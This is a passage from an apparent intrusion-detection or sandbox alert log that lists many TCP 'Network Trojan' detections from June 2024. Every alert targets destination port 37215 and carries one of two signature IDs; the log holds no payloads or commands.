          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241117
          SID:2835222
          Source Port:47944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740378
          SID:2829579
          Source Port:59416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730408
          SID:2829579
          Source Port:40210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857648
          SID:2829579
          Source Port:42130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829426
          SID:2835222
          Source Port:44046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855213
          SID:2829579
          Source Port:46944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448764
          SID:2835222
          Source Port:59834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157049
          SID:2829579
          Source Port:54522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795337
          SID:2829579
          Source Port:45594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154038
          SID:2835222
          Source Port:41888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888676
          SID:2829579
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675101
          SID:2829579
          Source Port:56746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115796
          SID:2835222
          Source Port:41348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014449
          SID:2835222
          Source Port:49570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599233
          SID:2835222
          Source Port:56520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403086
          SID:2829579
          Source Port:60084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740227
          SID:2829579
          Source Port:59106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241513
          SID:2829579
          Source Port:44284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107174
          SID:2835222
          Source Port:55406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738403
          SID:2829579
          Source Port:36804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354016
          SID:2835222
          Source Port:38642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188151
          SID:2835222
          Source Port:44492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731859
          SID:2835222
          Source Port:58906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740936
          SID:2835222
          Source Port:53562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896003
          SID:2829579
          Source Port:57582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159700
          SID:2829579
          Source Port:54764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781506
          SID:2829579
          Source Port:60440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912500
          SID:2829579
          Source Port:45380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703563
          SID:2829579
          Source Port:45510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446542
          SID:2829579
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408705
          SID:2829579
          Source Port:53608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783269
          SID:2835222
          Source Port:39452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732729
          SID:2829579
          Source Port:40150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043728
          SID:2835222
          Source Port:55750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729184
          SID:2829579
          Source Port:35668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164350
          SID:2835222
          Source Port:56506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356631
          SID:2835222
          Source Port:42494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799347
          SID:2835222
          Source Port:56208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896745
          SID:2835222
          Source Port:53986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745767
          SID:2829579
          Source Port:47820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106285
          SID:2829579
          Source Port:40116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276537
          SID:2835222
          Source Port:34318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018457
          SID:2835222
          Source Port:45952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460381
          SID:2835222
          Source Port:55872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128764
          SID:2835222
          Source Port:49462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896247
          SID:2829579
          Source Port:50786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262191
          SID:2835222
          Source Port:56648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160383
          SID:2835222
          Source Port:37978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402029
          SID:2835222
          Source Port:46132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897141
          SID:2835222
          Source Port:58588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264855
          SID:2835222
          Source Port:47036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268009
          SID:2835222
          Source Port:53830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275373
          SID:2835222
          Source Port:56884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518400
          SID:2835222
          Source Port:53066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509385
          SID:2835222
          Source Port:43438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801972
          SID:2835222
          Source Port:53494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.886985
          SID:2829579
          Source Port:39102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272003
          SID:2829579
          Source Port:44204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040428
          SID:2829579
          Source Port:39804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014603
          SID:2835222
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708903
          SID:2829579
          Source Port:50864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409489
          SID:2829579
          Source Port:42290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160393
          SID:2829579
          Source Port:51736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514476
          SID:2829579
          Source Port:35624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108179
          SID:2835222
          Source Port:36604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732750
          SID:2835222
          Source Port:33566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746528
          SID:2829579
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517798
          SID:2835222
          Source Port:48746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861225
          SID:2829579
          Source Port:39956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739391
          SID:2829579
          Source Port:42122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240496
          SID:2829579
          Source Port:36242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111807
          SID:2835222
          Source Port:58398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890837
          SID:2829579
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294802
          SID:2829579
          Source Port:49520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467095
          SID:2835222
          Source Port:42890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810358
          SID:2835222
          Source Port:40618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261188
          SID:2835222
          Source Port:37246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834330
          SID:2835222
          Source Port:51814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043573
          SID:2829579
          Source Port:38366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173553
          SID:2829579
          Source Port:37440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741647
          SID:2829579
          Source Port:43380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508756
          SID:2835222
          Source Port:56428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815191
          SID:2835222
          Source Port:43158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351866
          SID:2829579
          Source Port:35176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109368
          SID:2835222
          Source Port:53734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546500
          SID:2835222
          Source Port:33202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745702
          SID:2829579
          Source Port:51996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152954
          SID:2829579
          Source Port:60592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800941
          SID:2835222
          Source Port:49510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.154851
          SID:2829579
          Source Port:46540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600145
          SID:2829579
          Source Port:51594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005562
          SID:2829579
          Source Port:51488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.088048
          SID:2835222
          Source Port:35754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706832
          SID:2829579
          Source Port:41224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179590
          SID:2829579
          Source Port:47434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161321
          SID:2835222
          Source Port:37612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.297386
          SID:2835222
          Source Port:44694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155245
          SID:2829579
          Source Port:46796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153756
          SID:2835222
          Source Port:60842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731801
          SID:2835222
          Source Port:47608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854955
          SID:2835222
          Source Port:46590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394237
          SID:2829579
          Source Port:35358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843983
          SID:2829579
          Source Port:34580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175576
          SID:2835222
          Source Port:44852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021833
          SID:2835222
          Source Port:39742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707511
          SID:2829579
          Source Port:42742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672362
          SID:2835222
          Source Port:60416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471877
          SID:2835222
          Source Port:50464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152347
          SID:2829579
          Source Port:36422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160067
          SID:2835222
          Source Port:42040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099348
          SID:2835222
          Source Port:43082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731450
          SID:2835222
          Source Port:38504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260072
          SID:2835222
          Source Port:45650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598668
          SID:2835222
          Source Port:38028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467640
          SID:2829579
          Source Port:44862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798746
          SID:2829579
          Source Port:43160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600689
          SID:2835222
          Source Port:52660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402077
          SID:2829579
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749204
          SID:2835222
          Source Port:60456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179743
          SID:2829579
          Source Port:45994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175996
          SID:2835222
          Source Port:39562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241726
          SID:2835222
          Source Port:38944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035531
          SID:2829579
          Source Port:58276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017029
          SID:2835222
          Source Port:59806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.740988
          SID:2829579
          Source Port:55402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730402
          SID:2835222
          Source Port:46290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354086
          SID:2835222
          Source Port:53894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160247
          SID:2829579
          Source Port:49642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274706
          SID:2829579
          Source Port:60460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166616
          SID:2829579
          Source Port:51068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849609
          SID:2835222
          Source Port:60348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128117
          SID:2835222
          Source Port:47138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153215
          SID:2835222
          Source Port:42222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132108
          SID:2829579
          Source Port:59058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782167
          SID:2829579
          Source Port:49338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059848
          SID:2835222
          Source Port:50676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444065
          SID:2829579
          Source Port:33588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739778
          SID:2835222
          Source Port:40280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806890
          SID:2835222
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471525
          SID:2829579
          Source Port:59232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738577
          SID:2829579
          Source Port:36196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187931
          SID:2835222
          Source Port:44034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449364
          SID:2829579
          Source Port:55304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893892
          SID:2835222
          Source Port:46026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553208
          SID:2829579
          Source Port:47222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155422
          SID:2829579
          Source Port:38780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857997
          SID:2829579
          Source Port:54270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354072
          SID:2835222
          Source Port:56596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271969
          SID:2829579
          Source Port:46110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356980
          SID:2835222
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471374
          SID:2835222
          Source Port:35890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264286
          SID:2829579
          Source Port:59450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043520
          SID:2835222
          Source Port:39792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041342
          SID:2829579
          Source Port:42778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157423
          SID:2835222
          Source Port:57900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729494
          SID:2835222
          Source Port:37344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161048
          SID:2835222
          Source Port:37272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269263
          SID:2829579
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262676
          SID:2835222
          Source Port:47008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672793
          SID:2829579
          Source Port:39056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175377
          SID:2835222
          Source Port:50634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035568
          SID:2829579
          Source Port:37328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354371
          SID:2835222
          Source Port:42148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733116
          SID:2829579
          Source Port:51610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512281
          SID:2835222
          Source Port:55888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456117
          SID:2829579
          Source Port:41978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184657
          SID:2829579
          Source Port:59570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738902
          SID:2829579
          Source Port:57368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159585
          SID:2829579
          Source Port:45636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153010
          SID:2829579
          Source Port:52936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176176
          SID:2835222
          Source Port:51788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862534
          SID:2835222
          Source Port:49080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784145
          SID:2835222
          Source Port:48816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792063
          SID:2829579
          Source Port:54080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109080
          SID:2829579
          Source Port:40590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892130
          SID:2835222
          Source Port:33552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130910
          SID:2835222
          Source Port:38170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510916
          SID:2829579
          Source Port:45088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463367
          SID:2829579
          Source Port:41574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862672
          SID:2829579
          Source Port:33198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170596
          SID:2829579
          Source Port:36324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741957
          SID:2829579
          Source Port:53642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407179
          SID:2835222
          Source Port:49104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670461
          SID:2829579
          Source Port:49176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016682
          SID:2829579
          Source Port:36772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099213
          SID:2835222
          Source Port:52224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509119
          SID:2835222
          Source Port:45790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813024
          SID:2835222
          Source Port:39002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108273
          SID:2829579
          Source Port:60658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276720
          SID:2835222
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912506
          SID:2835222
          Source Port:51868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462920
          SID:2829579
          Source Port:60438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240016
          SID:2835222
          Source Port:38022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014573
          SID:2835222
          Source Port:53804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734704
          SID:2829579
          Source Port:54724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177107
          SID:2835222
          Source Port:41352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108771
          SID:2829579
          Source Port:44114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
